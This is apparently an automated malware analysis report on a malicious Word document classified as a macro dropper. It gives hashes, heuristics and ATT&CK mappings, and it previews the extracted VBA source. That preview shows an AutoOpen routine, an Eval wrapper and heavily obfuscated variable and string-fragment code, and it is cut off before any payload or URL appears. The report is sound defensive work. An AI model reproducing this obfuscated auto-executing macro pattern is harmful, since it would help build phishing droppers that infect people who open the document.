Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 877c17645821e1b5…

MALICIOUS

Office (OLE)

89.0 KB Created: 2016-09-05 22:43:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 4ccbcc1bd7acd38385ac014786fe6837 SHA-1: 0e6fb6cf8dabdf7b55768a02ec44eaa2c834f907 SHA-256: 877c17645821e1b51f8ed28ce15d88deaa4a32c2c3e7ec4476253318ebd66b80
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes CreateObject to execute code, strongly indicating its purpose is to download and run a second-stage payload. The ClamAV signature 'Doc.Dropper.Agent-6460039-0' further confirms its malicious nature as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6460039-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6460039-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15564 bytes
SHA-256: 40223438d8e177802e1e47d5afd66d47ba66ce06ad8dc2c798e6dc75a792a93d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ejehormybf2(ntujen0, ilushes)
ntujen0.Eval (ilushes)
End Sub
        
Sub AutoOpen()
Dim vmineqeqc
Dim ebyba, echohxopo, xnelabf6, aqanbygezw, urdypzigtucp8, omjepra, yjebxapbecq, hugepej, owarfupo3, cxonynwive, ohguvqi, xhehcaly, usmejbakh5, ybxovoxa, ywirykhiv2
Dim rapvostu, fzerfyva, bipefzeda, hcejdirc0, sdotkihtil8, isylliru2, arnoso, owajhe, ypaki1, cboksacetr
Dim olbybhe, fnarujmu1, uqefze1, wqosols, izbazejidd9, bogabaz0, skytjec, zecmadpedty, yclapwy0, gyzujritn8, idyduncu, angilvovas4, otebo, fqosfethy2
'hereafter beadle pulps scouts unbending
Dim kaliny2
Dim urysaz4, evecoc6, ydxiphulza, xyjoszyv4, ajtitydo9, domhotac9, hjixxut4, ydsolhod, avadleh, ozkinydme, basugybu2, uddasy0, qhucfykd
Dim etvofi
Dim nhyjzelz, jokmulpyky5, ulfekhyk9, vudfow, joqugoqji, zkybow9, ewfuduwb, fpyrveh6, ybdehgehi, pkapmispo1, moromcaqo3, ycmomren, ysgequ0
Dim iruhjuzlih
Dim wolalhoju5
Dim klufvoljady, ikqowmoqb9, nrodmynh1, ecykki, wwegeq, ekorwipoql, ujbaji6, adizkojoqh, oqozlopv4, ijdame, ajwahozq5, bderotkucx, gwomcilnyj5, vtirujosxe, psikulvo1, hoqpovkope
Dim alydigzimm7, icjekme5, yhqyndipo, fqyzenvycy, okefadafw, qidypub, yjkaxyzr7, lmentykhojy3, binsah, bepibe4, vcyjackohu, marolyhe6, ogiswa1, ygugnofbyh5, ubyjygvuhp, ahquqdesj, guqpuw1
'rumpus hacks loved archetypical tenderest recidivism
Dim hezwytijw
Dim avzazvowy0, ahwugyfd0, essydwudni2, fondacn, qivzyrra9, xgadirkept0, ssyhyjsonz4, ycyqyhg, ydgepe8, mzexag, pkimmica0, zhizhogjeq, jwyzhygasko, irascaru, gmofdicwitzo6
Dim hlebraq
Dim ymales
Dim izferugonf
Dim pdihbatera, vagfojpati, nypkexab3, rjihepgygf0, pirezl, izlajomdewj, etquqacsunh8, sbybumilv4, ifakno, opkytyra, tavzol1, nxylxorsod
Dim iqkufygpip
'dispiriting warmup descriptivism prudery plankton
Dim xilgucy9
Dim rupyvw
Dim hexmyrod9, ezecpy, uzytdi0, embilo, ncewacymh, axnyfody, hediznamla3, bsegbodnes, pmimdahyxga8, qkorxovju, dgucug1, ysbopahre1, usfara5, azhoqursi0
Dim neqzufy9, famaplazx, ohagdupguc6, ckosawquxo, tuvjamykse, ylcaqondu3, uxyxsibgu8, busbivvyxo, awaxiwe, yzjesyzaqt, eqxucxew, ydxingyfri, mnuknylpis
Dim unrytvy
Dim sdynykq0
'scatters inconsolable teed flask drums
Dim iwovkochuf9
Dim eshidfojne4
Dim ozvihqescu9
Dim zuretqex8
Dim zkymabb, eludiw4, ecmygyqydm, yfovy7, ivojtytje, axymdarri, gfilquxyp3, khyvyrlu3, bednorip, rxadaz3, maziz8, grufhepog, risfude0
Dim bdiqpemok0
Dim vudar6
'inhumanity ancestral car stakes formant accompanying gentility
Dim uqwedikjacj, kugik, ihkikfiq, oqahawwy7, ftyjypca, ogcycab8, padfanu6, wajywciti6, wejuwyj, nidxetp4, lutwulw2, ehyqo, otijvysda8, ivake, qtitomt
Dim ytwocedteh5, eqhubijc, qaxpyva, unsesutda, emcalkuqoct0, obezyroc6, uwamyncus0, lfezwuqula2, etoztucqa7, rezine, idpopcafdy8, usrymylcuj, esuxrewydl1
Dim alonryxyjv
Dim tekmuryx, dbasubpepo0, lgafpislokc, vonoksomqy3, fohmeckyvx6, magrem0, ynenban0, atekzi, cybushub6, dufizy4, ywpobgubd, ahyquqh7, jakezz0, hebowx5
Dim uzlukbuprix
Dim cachenrahbu
'unscrambles containing befit smirks variety plastics timekeeper
Dim subylle, mofpemta2, ulyxrusin1, svykyhewe7, avymoni0, fxyvmap, ydqijy, iguvuf0, itgyzihixl, iwtobjunu4
Dim ihirimbi0, eriflamk, alzesjady, txosolbo7, idometd, icpupoj9, gejvomj2, lepuwh0, ikfijerik1, usdumonb, ipxyfo, xivybn, yqtyhy0, gdukojyvy1, cimsutaso7, wabofji
Dim ohmahawbexh, onasolkacm6, gojdilh, duxomas, ukgyjgoh, vavemdo, ebmijk3, gimdofse, papi2, janpesvo, rajuronr
Dim azulyvk
Dim ihetag, ivxiwpotgy5, ypezu, vraheku9, jicu, depgymif, ovixame3, wdusebj3, belfanky
Dim elynjebtu5, rynzazd2, drafak, oncogkyvd9, nlahpyra7
'abhorrence blindfolded descenders rectifier heterosexuals physiotherapist endorses pessimistically slimness
ukgyjgoh = "ew"
owarfupo3 = "bj"
cybushub6 = " +"
nidxetp4 = "el"
yqtyhy0 = "va"
atekzi = "Ge"
'ineradicably vernacul
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.